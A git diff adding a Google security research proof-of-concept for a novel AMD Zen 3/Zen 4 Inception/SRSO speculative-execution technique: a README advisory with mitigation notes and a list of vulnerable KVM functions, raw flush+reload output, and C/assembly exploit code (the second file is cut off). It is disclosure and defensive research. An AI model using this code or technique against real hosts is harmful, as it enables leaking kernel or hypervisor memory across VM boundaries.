diff --git a/pocs/cpus/inception/Makefile b/pocs/cpus/inception/Makefile
new file mode 100644
index 00000000..9921ce3f
--- /dev/null
+++ b/pocs/cpus/inception/Makefile
@@ -0,0 +1,7 @@
+all: clean poc
+
+poc:
+	$(CC) $(CFLAGS) -static -O0 poc.c -o poc
+
+clean:
+	rm -f poc
diff --git a/pocs/cpus/inception/README.md b/pocs/cpus/inception/README.md
new file mode 100644
index 00000000..9d10c5a7
--- /dev/null
+++ b/pocs/cpus/inception/README.md
@@ -0,0 +1,197 @@
+# Novel Inception/SRSO exploitation method
+
+TL;DR We could exploit SRSO in KVM on AMD Zen 3 and Zen 4 by controlling the
+full return address stack (RAS). We did so by injecting a PhantomJMP (which
+subsequently injects a PhantomCALL) in the pipeline after a dispatch serializing
+instruction.
+
+### Context
+
+The Inception paper reports that on Zen 3 they could only poison one RAS entry
+and required a deep call stack to discard the corrected entries. On Zen 4, they
+report that they could poison multiple entries but they still needed a deep call
+stack to discard the corrected ones. As a result, they could only exploit SRSO
+on Zen 4 and they reported that they didn't find a suitable code pattern to
+exploit it on Zen 3.
+
+> "Specifically, on Zen 3 microarchitectures we hijack a single return
+> instruction by first exhausting 17 uncorrupted RSB entries. On Zen 4, we need
+> to exhaust 8 uncorrupted RSB entries, after which we control the next 16
+> return target predictions."[^1]
+
+### Problem
+
+We experimented with the findings in the Inception paper and observed that
+injecting the PhantomJMP after a dispatch serializing instruction like `rdtscp`,
+`lfence`, `cpuid`, `wrmsr`, `invlpga` will preserve all RAS entries injected by
+the PhantomCALL and all of them will be used for predicting the following return
+instructions. See the code below.
+
+```
+cpuid
+instr
+instr
+..
+ret
+```
+
+If the PhantomJMP collides in the BTB with any of the instructions following
+`cpuid`, then the `ret` speculatively executes the gadget injected by the
+PhantomCALL. Moreover, all following `ret` instructions will continue
+mispredicting from the poisoned RAS entries. We attached a proof-of-concept
+implementation of this vulnerability which works on Zen 3 and Zen 4.
+
+We tested it on the following cpus:
+
+-   AMD EPYC 9B14 96-Core Processor ucode(0xa101144)
+
+-   AMD EPYC 7B13 64-Core Processor ucode (0xa0011d1)
+
+### Proof-of-concept
+
+Consider the code above to be the vulnerable code pattern. We train the
+PhantomJMP to collide with the `ret` following `cpuid`. The PhantomJMP
+destination is the PhantomCALL location. We train the PhantomCALL to collide
+with the instruction preceeding the gadget. We find that the requirements
+presented in the paper regarding the location and destination of the
+PhantomJMP (section 6.3) are not necessary for the exploit to work neither on
+Zen 3 nor Zen 4.
+
+poc.c allows you to pass the depth of the call stack in the command line. Before
+every return, we shift the flush+reload array by 0x1000 to measure precisely
+which return instructions in the call stack mispredicted from the RAS.
+
+### Results
+
+We show that on both Zen 3 and Zen 4 we can control the full RAS.
+
+```
+make
+./poc 32 # will report hits from entry 0 to 32.
+```
+
+To test without the dispatch serializing instruction:
+
+```
+make CFLAGS="-DNO_DSI=1"
+./poc 32 # will report a few entries > only
+```
+
+In our experiments, we added a RSB clearing sequence to see if that would remove
+the signal.
+
+```
+make CFLAGS="-DMITIGATION -DRSB_DEPTH=8"
+./poc 32 # will report hits from entry 0 and 8-32
+```
+
+To clear the signal, run the following:
+
+```
+make CFLAGS="-DMITIGATION -DRSB_DEPTH=32"
+./poc 32 # will report hits on entry #0
+```
+
+We didn't clear the signal for the first return in the `a()` execution so a hit
+for entry #0 will always show up.
+
+### Root Cause hypothesis
+
+As a result of our analysis, we hypothesize that this vulnerability is possible
+because of the special microarchitectural conditions created by the
+architectural execution of dispatch serializing instructions. We think that such
+instruction brings the RAS in a "clean" state which doesn't trigger the
+invalidation of RAS entries injected as a result of PhantomCALL speculation.
+
+### Mitigation
+
+We didn't research what impact does this finding have on safeRET. Given that
+this vulnerability happens in microarchitectural conditions created by dispatch
+serializing instructions and that such instructions are microcoded, we think AMD
+might be able to issue a microcode fix. We confirmed that IBPB mitigates this
+issue on Zen 3 and Zen 4.
+
+#### New mitigation discussion
+
+We investigated a potential mitigation for this particular vulnerability, namely
+clearing the RSB before the first return instruction that comes after a dispatch
+serializing instruction. We used the upstream Linux RSB clearing sequence in our
+experiments. We observed that the PhantomJMP can be trained to overlap with one
+of the RSB clearing sequence instructions or with the `ret`, therefore the
+signal was still present for specific RSB entries. With a 32-entry RSB clearing
+sequence, we couldn't observe signal for the first `ret` in the deep call stack
+but from the 20th `ret` execution onwards, depending on the depth of the call
+stack.
+
+We conclude, based on our experiments, that clearing the RSB before the first
+return instruction that executes after a dispatch serializing instruction,
+reduces the risk of this vulnerability by hindering the possibility of
+controlling the full RSB.
+
+### Impact
+
+Vulnerable function                                                                                                 | Serializing instruction
+------------------------------------------------------------------------------------------------------------------- | -----------------------
+[kvm_set_user_return_msr](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_set_user_return_msr)                 | wrmsr
+[kvm_set_msr_common](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_set_msr_common)                           | wrmsr
+[vcpu_enter_guest](https://elixir.bootlin.com/linux/v6.10.3/C/ident/vcpu_enter_guest)                               | wrmsr
+[svm_complete_interrupt_delivery](https://elixir.bootlin.com/linux/v6.10.3/C/ident/svm_complete_interrupt_delivery) | wrmsr
+[kvm_emulate_wbinvd](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_emulate_wbinvd)                           | wbinvd
+[svm_flush_tlb_gva](https://elixir.bootlin.com/linux/v6.10.3/C/ident/svm_flush_tlb_gva)                             | invlpga
+[read_tsc](https://elixir.bootlin.com/linux/v6.10.3/C/ident/read_tsc)                                               | rdtscp
+
+We found 7 code patterns (see above) in the upstream Linux KVM implementation
+which are potentially exploitable. We have a full exploit for `read_tsc` which
+we trigger using `vmmcall` with `rax = KVM_HC_CLOCK_PAIRING`. This was the
+easiest to exploit because the guest controls up to three (3) arguments. The
+exploit works on AMD Zen 3 and we consider it needs a few small adjustments to
+work on AMD Zen 4 as well. We achieved an arbitrary memory read primitive in the
+host kernel.
+
+Given the above, we consider the risk assessment section of this recent
+[AMD report](https://www.amd.com/content/dam/amd/en/documents/epyc-technical-docs/white-papers/amd-epyc-9004-wp-srso.pdf)
+to be inaccurate.
+
+#### Speculative ROP
+
+We discovered a novel method to control the RAS that allows us to chain gadgets
+to construct a disclosure primitive. This method is different from the "Dueling
+recursive phantom calls" presented in the Inception paper (Section 7.4).
+
+To inject two gadgets in the RAS, we use two chained recursive PhantomCALLs.
+
+```
+gadget1 - 5: PhantomCALL (call gadget2 - 5)
+gadget1:
+```
+
+```
+gadget2 - 5: PhantomCALL (call gadget1 - 5)
+gadget2:
+```
+
+When `gadget1 - 5` is fetched, `gadget1` is pushed to RAS. Then the cpu starts
+fetching at `gadget2 - 5`, according to the first PhantomCALL destination. That
+pushes `gadget2` to RAS. Next, the cpu fetches at `gadget1 - 5` again and pushes
+`gadget1` to RAS and so on. This results in `gadget1` and `gadget2` to be
+interleaved in the RAS.
+
+With this method we could chain up to three (3) gadgets. In our KVM exploit, we
+only need to chain two gadgets to achieve a reliable disclosure primitive.
+
+### Disclosure
+
+We are privately disclosing this vulnerability to you so that you can develop a
+fix and manage its rollout. We do not require you to keep any information of
+this report secret, but if you make it public then please let us know that you
+did. This advisory will be kept private by Google for 30 days after a fix is
+publicly available or after 90 days if no fix is made. After this deadline we
+plan to disclose this advisory in full at:
+http://github.com/google/security-research/. Please read more details about this
+policy here: https://g.co/appsecurity
+
+Finder: Andy Nguyen of the Google Security Team
+
+Credits: Andy Nguyen, Anthony Weems, Matteo Rizzo, Alexandra Sandulescu
+
+[^1]: https://comsec.ethz.ch/wp-content/files/inception_sec23.pdf
diff --git a/pocs/cpus/inception/out.txt b/pocs/cpus/inception/out.txt
new file mode 100644
index 00000000..eb8a06b5
--- /dev/null
+++ b/pocs/cpus/inception/out.txt
@@ -0,0 +1,198 @@
+inception
+==== round 0 =====
+==== round 1 =====
+hit for 1
+hit for 2
+hit for 11
+hit for 12
+==== round 2 =====
+hit for 0
+hit for 1
+hit for 2
+hit for 5
+hit for 6
+hit for 7
+hit for 8
+hit for 9
+hit for 10
+hit for 11
+hit for 12
+hit for 13
+hit for 14
+hit for 15
+hit for 16
+hit for 17
+hit for 18
+hit for 19
+hit for 20
+hit for 21
+hit for 22
+hit for 23
+hit for 24
+hit for 25
+hit for 26
+hit for 27
+hit for 28
+hit for 29
+hit for 30
+hit for 31
+hit for 32
+hit for 33
+hit for 34
+==== round 3 =====
+hit for 0
+hit for 1
+hit for 4
+hit for 5
+hit for 21
+==== round 4 =====
+hit for 0
+hit for 1
+hit for 2
+hit for 3
+hit for 4
+hit for 5
+hit for 6
+hit for 7
+hit for 8
+hit for 9
+hit for 10
+hit for 11
+hit for 12
+hit for 13
+hit for 14
+hit for 15
+hit for 16
+hit for 17
+hit for 18
+hit for 19
+hit for 20
+hit for 21
+hit for 22
+hit for 23
+hit for 24
+hit for 25
+hit for 26
+hit for 27
+hit for 28
+hit for 29
+hit for 30
+hit for 31
+hit for 32
+hit for 33
+hit for 34
+==== round 5 =====
+hit for 0
+hit for 1
+hit for 17
+hit for 18
+==== round 6 =====
+hit for 0
+hit for 1
+hit for 2
+hit for 3
+hit for 4
+hit for 5
+hit for 6
+hit for 7
+hit for 8
+hit for 9
+hit for 10
+hit for 11
+hit for 12
+hit for 13
+hit for 14
+hit for 15
+hit for 16
+hit for 17
+hit for 18
+hit for 19
+hit for 20
+hit for 21
+hit for 22
+hit for 23
+hit for 24
+hit for 25
+hit for 26
+hit for 27
+hit for 28
+hit for 29
+hit for 30
+hit for 31
+hit for 32
+hit for 33
+hit for 34
+==== round 7 =====
+hit for 0
+hit for 1
+hit for 2
+hit for 3
+hit for 4
+hit for 5
+hit for 6
+hit for 7
+hit for 8
+hit for 9
+hit for 10
+hit for 11
+hit for 12
+hit for 13
+hit for 14
+hit for 15
+hit for 16
+hit for 17
+hit for 18
+hit for 19
+hit for 20
+hit for 21
+hit for 22
+hit for 23
+hit for 24
+hit for 25
+hit for 26
+hit for 27
+hit for 28
+hit for 29
+hit for 30
+hit for 31
+hit for 32
+hit for 33
+hit for 34
+==== round 8 =====
+hit for 0
+hit for 1
+hit for 2
+hit for 3
+hit for 4
+hit for 5
+hit for 6
+hit for 7
+hit for 8
+hit for 9
+hit for 10
+hit for 11
+hit for 12
+hit for 13
+hit for 14
+hit for 15
+hit for 16
+hit for 17
+hit for 18
+hit for 19
+hit for 20
+hit for 21
+hit for 22
+hit for 23
+hit for 24
+hit for 25
+hit for 26
+hit for 27
+hit for 28
+hit for 29
+hit for 30
+hit for 31
+hit for 32
+hit for 33
+hit for 34
+==== round 9 =====
+hit for 0
diff --git a/pocs/cpus/inception/poc.c b/pocs/cpus/inception/poc.c
new file mode 100644
index 00000000..3b8fa12d
--- /dev/null
+++ b/pocs/cpus/inception/poc.c
@@ -0,0 +1,320 @@
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/ucontext.h>
+#include <unistd.h>
+#include <x86intrin.h>
+
+#define PWN_PATTERN 0x100100000000
+#define ADDRESS_A 0x20000000
+#define ADDRESS_B (ADDRESS_A ^ PWN_PATTERN)
+#define CACHE_THRESHOLD 120
+#define ITERATIONS 10
+
+// Hopefully tricks the prefetcher to avoid false positives.
+#define PREFETCH_OFFSET 0x800
+
+static int should_segfault = 0;
+
+static void pin_cpu(int cpu) {
+  cpu_set_t set;
+  CPU_ZERO(&set);
+
+  CPU_SET(cpu, &set);
+  sched_setaffinity(0, sizeof(set), &set);
+}
+
+// Load a byte from memory and time how long it takes
+static uint64_t time_load(const void *addr) {
+  uint64_t ret;
+
+  asm volatile(
+      // rdtscp waits for earlier instructions to retire before reading the
+      // TSC.
+      "rdtscp\n"
+      // timestamp in r8d:ebx
+      "mov %%eax, %%ebx\n"
+      "mov %%edx, %%r8d\n"
+      "lfence\n"
+
+      // Do the memory access.
+      "movb (%%rdi), %%cl\n"
+
+      // On AMD/Linux lfence always waits for all previous instructions to
+      // retire before executing the next instruction.
+      "rdtscp\n"
+      // timestamp in edx:eax
+      "lfence\n"
+
+      "shlq $32, %%r8\n"
+      // timestamp in rbx
+      "orq %%r8, %%rbx\n"
+      "shlq $32, %%rdx\n"
+      // timestamp in rax
+      "orq %%rdx, %%rax\n"
+      "subq %%rbx, %%rax\n"
+      : "=a"(ret)
+      : "D"(addr)
+      : "rbx", "rcx", "rdx", "r8");
+
+  return ret;
+}
+
+static __attribute__((naked, noinline)) void train_arch(
+    uint64_t target, uint64_t training_code) {
+  asm volatile(
+      "mov %0, %%r8\n\t"
+      // Used to recover from crash
+      "leaq 1f(%%rip), %%rcx\n\t"
+
+      "jmp *%%rsi\n"
+
+      "1:\n"
+      "pop %%rax\n\t"
+      "2:"
+      "retq\n" ::"r"(target),
+      "S"(training_code)
+      : "memory", "r8");
+}
+
+extern void *a_start, *a_load, *a_end;
+extern void *b_start, *b_load, *b_end;
+
+#define STR(x) #x
+#define XSTR(s) STR(s)
+static __attribute__((naked, noinline, used)) void gadgets() {
+  asm("a_start:\n"
+#ifndef NO_DSI
+      "  push %rax\n"
+      "  push %rbx\n"
+      "  push %rcx\n"
+      "  push %rdx\n"
+      "  cpuid\n"
+      "  pop %rdx\n"
+      "  pop %rcx\n"
+      "  pop %rbx\n"
+      "  pop %rax\n"
+#endif
+      // PhantomJMP
+      "  nop\n"
+      "  nop\n"
+      "  ret\n"
+      ".skip 0x1000, 0x90\n"
+      "a_load:\n"
+      // PhantomCALL
+      "  call a_some_func\n"
+      // Loads from rdi which points to a fr_array entry
+      "  movq " XSTR(PREFETCH_OFFSET) "(%rdi), %rax\n"
+      "  xor %rdi, %rdi\n"
+      "  ret\n"
+      "a_some_func:\n"
+      "  ret\n"
+      "a_end:\n");
+
+  asm("b_start:\n"
+#ifndef NO_DSI
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+#endif
+      "  call *%r8\n"  // training jmp
+      ".skip 0x1000, 0x90\n"
+      "b_load:\n"
+      "  call *%r8\n"  // training call
+      "b_end:\n");
+}
+
+#define lfsr_advance(lfsr)                                              \
+  {                                                                     \
+    uint8_t bit = (lfsr ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1; \
+    lfsr = (lfsr >> 1) | (bit << 7);                                    \
+  }
+
+#define FR_COUNT 256
+#define FR_ARRAY_SIZE (2 * 1024 * 1024)
+#define FR_STRIDE 0x1000
+
+static void *fr_array;
+
+static __always_inline void inception_flush(void) {
+  for (int i = 0; i < FR_COUNT; i++) {
+    asm volatile("clflush (%0)"
+                 :
+                 : "r"(fr_array + i * FR_STRIDE + PREFETCH_OFFSET)
+                 : "memory");
+  }
+
+  asm volatile("mfence" ::: "memory");
+}
+static __always_inline void inception_flush_one(uint64_t ptr) {
+  asm volatile("clflush (%0); mfence" : : "r"(ptr) : "memory");
+}
+
+static __always_inline uint8_t inception_reload(int hits[]) {
+  asm volatile("mfence" ::: "memory");
+
+  // use lfsr because of aggressive prefetching
+  uint8_t lfsr = 123;
+
+  uint64_t t = time_load(fr_array + PREFETCH_OFFSET);
+  inception_flush_one((uint64_t)fr_array + PREFETCH_OFFSET);
+  if (t < CACHE_THRESHOLD) hits[0] = 1;
+
+  for (int i = 1; i < FR_COUNT; i++) {
+    lfsr_advance(lfsr);
+    uint64_t t = time_load(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET);
+    // flush immediately after
+    inception_flush_one(
+        (uint64_t)(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET));
+
+    if (t < CACHE_THRESHOLD) hits[lfsr] = 1;
+  }
+
+  return 0;
+}
+
+static void handle_segv(int sig, siginfo_t *si, void *ucontext) {
+  ucontext_t *ctx = ucontext;
+
+  if (!should_segfault) {
+    printf("Unexpected segfault\n");
+    exit(1);
+  }
+
+  should_segfault = 0;
+  ctx->uc_mcontext.gregs[REG_RIP] = ctx->uc_mcontext.gregs[REG_RCX];
+}
+
+extern void deep_callstack_done(void);
+
+int main(int argc, char *argv[]) {
+  int depth = 20;
+  if (argc >= 2) {
+    depth = atoi(argv[1]);
+
+    if (depth < 2) {
+      printf("invalid depth. Must be >= 2\n");
+      exit(EXIT_FAILURE);
+    }
+  }
+
+  struct sigaction sa;
+  sa.sa_flags = SA_SIGINFO;
+  sigemptyset(&sa.sa_mask);
+  sa.sa_sigaction = &handle_segv;
+  sigaction(SIGSEGV, &sa, NULL);
+
+  printf("inception\n");
+
+  pin_cpu(1);
+
+  fr_array = mmap((void *)0x10000000, 2 * 1024 * 1024, PROT_READ | PROT_WRITE,
+                  MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+  memset(fr_array, 'A', 2 * 1024 * 1024);
+
+  void *a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024,
+                         PROT_READ | PROT_WRITE | PROT_EXEC,
+                         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+  memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start);
+
+  void *b = (void *)mmap((void *)ADDRESS_B, 2 * 1024 * 1024,
+                         PROT_READ | PROT_WRITE | PROT_EXEC,
+                         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+  memcpy((void *)b, &b_start, (uint64_t)&b_end - (uint64_t)&b_start);
+
+  if ((uint64_t)&a_load - (uint64_t)&a_start !=
+      (uint64_t)&b_load - (uint64_t)&b_start) {
+    printf("mismatch: %lx vs %lx\n", (uint64_t)&a_load - (uint64_t)&a_start,
+           (uint64_t)&b_load - (uint64_t)&b_start);
+    return 0;
+  }
+
+  for (int j = 0; j < ITERATIONS; j++) {
+    munmap(a, 2 * 1024 * 1024);
+
+    mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE | PROT_EXEC);
+
+    // Train
+    for (int i = 0; i < 2; i++) {
+      should_segfault = 1;
+      train_arch(ADDRESS_A + ((uint64_t)&a_load - (uint64_t)&a_start),
+                 (ADDRESS_B + (uint64_t)&b_start - (uint64_t)&b_start));
+
+      should_segfault = 1;
+      train_arch(ADDRESS_A + ((uint64_t)&a_load - (uint64_t)&a_start),
+                 (ADDRESS_B + (uint64_t)&b_load - (uint64_t)&b_start));
+    }
+
+    // mark b as NX
+    mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE);
+
+    a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024,
+                     PROT_READ | PROT_WRITE | PROT_EXEC,
+                     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+    memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start);
+
+    printf("==== round %d =====\n", j);
+
+    // FLush
+    inception_flush();
+
+    // Trigger victim
+    // deep call stack
+    asm volatile(
+        "push %3; mfence\n\t"  // last ret will exit
+        "z: cmp $2, %0; jle out; dec %0\n\t"
+        "call z\n\t"
+        // shift the fr_array ptr
+        "add $0x1000, %%rdi; ret\n\t"
+
+        "out:\n\t"
+        "mov %1, %%rdi\n\t"
+        "call *%2\n\t"
+
+#ifdef MITIGATION
+#ifndef RSB_DEPTH
+#define RSB_DEPTH 32
+#endif
+        // RSB clearing
+        ".rept " XSTR(RSB_DEPTH) "\n"
+        "call 1f\n"
+        "int3\n"
+        "1:\n"
+        ".endr\n"
+        "add $(8 * " XSTR(RSB_DEPTH) "), %%rsp\n"
+#endif
+        // shift the fr_array ptr
+        "add $0x1000, %%rdi\n\t"
+        "ret\n\t"
+        "deep_callstack_done:"
+        :
+        : "r"(depth), "r"(fr_array), "r"(a), "r"(deep_callstack_done)
+        : "rdi", "memory", "rcx");
+
+    // Reload
+    int hits[256] = {};
+    inception_reload(hits);
+
+    for (int i = 0; i < 256; i++)
+      if (hits[i]) printf("hit for %d\n", i);
+
+    fflush(stdout);
+  }
+
+  return 0;
+}
diff --git a/pocs/cpus/inception/poc3.c b/pocs/cpus/inception/poc3.c
new file mode 100644
index 00000000..89a0808c
--- /dev/null
+++ b/pocs/cpus/inception/poc3.c
@@ -0,0 +1,344 @@
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/ucontext.h>
+#include <unistd.h>
+#include <x86intrin.h>
+
+#define PWN_PATTERN 0x000080080000
+#define ADDRESS_A 0x20000000
+#define ADDRESS_B (ADDRESS_A ^ PWN_PATTERN)
+#define CACHE_THRESHOLD 120
+#define ITERATIONS 10
+
+// Hopefully tricks the prefetcher to avoid false positives.
+#define PREFETCH_OFFSET 0x800
+
+static int should_segfault = 0;
+
+static void pin_cpu(int cpu) {
+  cpu_set_t set;
+  CPU_ZERO(&set);
+
+  CPU_SET(cpu, &set);
+  sched_setaffinity(0, sizeof(set), &set);
+}
+
+// Load a byte from memory and time how long it takes
+static uint64_t time_load(const void *addr) {
+  uint64_t ret;
+
+  asm volatile(
+      // rdtscp waits for earlier instructions to retire before reading the
+      // TSC.
+      "rdtscp\n"
+      // timestamp in r8d:ebx
+      "mov %%eax, %%ebx\n"
+      "mov %%edx, %%r8d\n"
+      "lfence\n"
+
+      // Do the memory access.
+      "movb (%%rdi), %%cl\n"
+
+      // On AMD/Linux lfence always waits for all previous instructions to
+      // retire before executing the next instruction.
+      "rdtscp\n"
+      // timestamp in edx:eax
+      "lfence\n"
+
+      "shlq $32, %%r8\n"
+      // timestamp in rbx
+      "orq %%r8, %%rbx\n"
+      "shlq $32, %%rdx\n"
+      // timestamp in rax
+      "orq %%rdx, %%rax\n"
+      "subq %%rbx, %%rax\n"
+      : "=a"(ret)
+      : "D"(addr)
+      : "rbx", "rcx", "rdx", "r8");
+
+  return ret;
+}
+
+static __attribute__((naked, noinline)) void train_arch(
+    uint64_t target, uint64_t training_code) {
+  asm volatile(
+      "mov %0, %%r8\n\t"
+      // Used to recover from crash
+      "leaq 1f(%%rip), %%rcx\n\t"
+
+      "jmp *%%rsi\n"
+
+      "1:\n"
+      "pop %%rax\n\t"
+      "2:"
+      "retq\n" ::"r"(target),
+      "S"(training_code)
+      : "memory", "r8");
+}
+
+static __attribute__((naked, noinline)) void train_ret(uint64_t target,
+                                                       uint64_t training_code) {
+  asm volatile(
+      "mov %0, %%r8\n\t"
+
+      // Flush the stack to widen the speculation window.
+      "clflush -8(%%rsp)\n"
+      "mfence\n"
+
+      "call 1f\n"
+      // Executed only speculatively
+      "jmp *%%rsi\n"
+      "lfence\n"
+
+      "1:\n"
+      // For some reason, compiler emits a different instruction that crashes,
+      // so hardcode bytes here.
+      // add 0x8, %%rsp
+      ".byte 0x48, 0x83, 0xc4, 0x08\n"
+      "retq\n" ::"r"(target)
+      : "memory");
+}
+
+extern void *a_start, *a_load, *a_end;
+extern void *b_start, *b_load, *b_end;
+
+#define STR(x) #x
+#define XSTR(s) STR(s)
+static __attribute__((naked, noinline, used)) void gadgets() {
+  asm("a_start:\n"
+#ifndef NO_DSI
+      "  push %rax\n"
+      "  push %rbx\n"
+      "  push %rcx\n"
+      "  push %rdx\n"
+      "  cpuid\n"
+      "  pop %rdx\n"
+      "  pop %rcx\n"
+      "  pop %rbx\n"
+      "  pop %rax\n"
+#endif
+      // PhantomJMP
+      "  nop\n"
+      "  nop\n"
+      "  ret\n"
+      ".skip 0x1000, 0x90\n"
+      "a_load:\n"
+      // PhantomCALL
+      "  call a_some_func\n"
+      // Loads from rdi which points to a fr_array entry
+      "  movq " XSTR(PREFETCH_OFFSET) "(%rdi), %rax\n"
+      "  xor %rdi, %rdi\n"
+      "  ret\n"
+      "a_some_func:\n"
+      "  ret\n"
+      "a_end:\n");
+
+  asm("b_start:\n"
+#ifndef NO_DSI
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+      "  nop\n"
+#endif
+      "  call *%r8\n"  // training jmp
+      ".skip 0x1000, 0x90\n"
+      "b_load:\n"
+      "  call *%r8\n"  // training call
+      "b_end:\n");
+}
+
+#define lfsr_advance(lfsr)                                              \
+  {                                                                     \
+    uint8_t bit = (lfsr ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1; \
+    lfsr = (lfsr >> 1) | (bit << 7);                                    \
+  }
+
+#define FR_COUNT 256
+#define FR_ARRAY_SIZE (2 * 1024 * 1024)
+#define FR_STRIDE 0x1000
+
+static void *fr_array;
+
+static __always_inline void inception_flush(void) {
+  for (int i = 0; i < FR_COUNT; i++) {
+    asm volatile("clflush (%0)"
+                 :
+                 : "r"(fr_array + i * FR_STRIDE + PREFETCH_OFFSET)
+                 : "memory");
+  }
+
+  asm volatile("mfence" ::: "memory");
+}
+static __always_inline void inception_flush_one(uint64_t ptr) {
+  asm volatile("clflush (%0); mfence" : : "r"(ptr) : "memory");
+}
+
+static __always_inline uint8_t inception_reload(int hits[]) {
+  asm volatile("mfence" ::: "memory");
+
+  // use lfsr because of aggressive prefetching
+  uint8_t lfsr = 123;
+
+  uint64_t t = time_load(fr_array + PREFETCH_OFFSET);
+  inception_flush_one((uint64_t)fr_array + PREFETCH_OFFSET);
+  if (t < CACHE_THRESHOLD) hits[0] = 1;
+
+  for (int i = 1; i < FR_COUNT; i++) {
+    lfsr_advance(lfsr);
+    uint64_t t = time_load(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET);
+    // flush immediately after
+    inception_flush_one(
+        (uint64_t)(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET));
+
+    if (t < CACHE_THRESHOLD) hits[lfsr] = 1;
+  }
+
+  return 0;
+}
+
+static void handle_segv(int sig, siginfo_t *si, void *ucontext) {
+  ucontext_t *ctx = ucontext;
+
+  if (!should_segfault) {
+    printf("Unexpected segfault\n");
+    exit(1);
+  }
+
+  should_segfault = 0;
+  ctx->uc_mcontext.gregs[REG_RIP] = ctx->uc_mcontext.gregs[REG_RCX];
+}
+
+extern void deep_callstack_done(void);
+
+int main(int argc, char *argv[]) {
+  int depth = 20;
+  if (argc >= 2) {
+    depth = atoi(argv[1]);
+
+    if (depth < 2) {
+      printf("invalid depth. Must be >= 2\n");
+      exit(EXIT_FAILURE);
+    }
+  }
+
+  struct sigaction sa;
+  sa.sa_flags = SA_SIGINFO;
+  sigemptyset(&sa.sa_mask);
+  sa.sa_sigaction = &handle_segv;
+  sigaction(SIGSEGV, &sa, NULL);
+
+  printf("inception\n");
+
+  pin_cpu(1);
+
+  fr_array = mmap((void *)0x10000000, 2 * 1024 * 1024, PROT_READ | PROT_WRITE,
+                  MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+  memset(fr_array, 'A', 2 * 1024 * 1024);
+
+  void *a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024,
+                         PROT_READ | PROT_WRITE | PROT_EXEC,
+                         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+  memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start);
+
+  void *b = (void *)mmap((void *)ADDRESS_B, 2 * 1024 * 1024,
+                         PROT_READ | PROT_WRITE | PROT_EXEC,
+                         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+  memcpy((void *)b, &b_start, (uint64_t)&b_end - (uint64_t)&b_start);
+
+  if ((uint64_t)&a_load - (uint64_t)&a_start !=
+      (uint64_t)&b_load - (uint64_t)&b_start) {
+    printf("mismatch: %lx vs %lx\n", (uint64_t)&a_load - (uint64_t)&a_start,
+           (uint64_t)&b_load - (uint64_t)&b_start);
+    return 0;
+  }
+
+  for (int j = 0; j < ITERATIONS; j++) {
+    munmap(a, 2 * 1024 * 1024);
+
+    mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE | PROT_EXEC);
+
+    // Train
+    for (int i = 0; i < 2; i++) {
+      // should_segfault = 1;
+      train_ret(ADDRESS_B + ((uint64_t)&b_load - (uint64_t)&b_start),
+                (ADDRESS_B + (uint64_t)&b_start - (uint64_t)&b_start));
+
+      // should_segfault = 1;
+      train_ret(ADDRESS_B + ((uint64_t)&b_load - (uint64_t)&b_start),
+                (ADDRESS_B + (uint64_t)&b_load - (uint64_t)&b_start));
+    }
+
+    // mark b as NX
+    mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE);
+
+    a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024,
+                     PROT_READ | PROT_WRITE | PROT_EXEC,
+                     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
+    memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start);
+
+    sched_yield();
+
+    // FLush
+    inception_flush();
+
+    // Trigger victim
+    // deep call stack
+    asm volatile(
+        "push %3; mfence\n\t"  // last ret will exit
+        "z: cmp $2, %0; jle out; dec %0\n\t"
+        "call z\n\t"
+        // shift the fr_array ptr
+        "add $0x1000, %%rdi; ret\n\t"
+
+        "out:\n\t"
+        "mov %1, %%rdi\n\t"
+        "call *%2\n\t"
+
+#ifdef MITIGATION
+#ifndef RSB_DEPTH
+#define RSB_DEPTH 32
+#endif
+        // RSB clearing
+        ".rept " XSTR(RSB_DEPTH) "\n"
+        "call 1f\n"
+        "int3\n"
+        "1:\n"
+        ".endr\n"
